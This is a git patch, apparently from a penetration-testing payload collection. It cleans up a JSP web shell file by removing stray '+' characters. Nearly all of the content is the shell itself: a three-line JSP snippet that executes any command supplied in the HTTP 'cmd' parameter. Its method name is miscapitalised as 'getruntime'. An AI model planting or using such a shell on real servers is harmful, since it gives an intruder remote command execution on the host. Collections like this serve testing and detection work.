From 2affd894a41c252b47b856b12c371a9465246dcd Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 11 Mar 2019 17:12:47 +0100 Subject: [PATCH] fix file remove what seems to be a git addition (`+`) --- Web-Shells/JSP/simple-shell.jsp | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Web-Shells/JSP/simple-shell.jsp b/Web-Shells/JSP/simple-shell.jsp index 3c15f24a..dd21aa97 100644 --- a/Web-Shells/JSP/simple-shell.jsp +++ b/Web-Shells/JSP/simple-shell.jsp @@ -1,3 +1,3 @@ -+<% -+Runtime.getruntime().exec(request.getParameter("cmd")) -+%> +<% +Runtime.getruntime().exec(request.getParameter("cmd")) +%>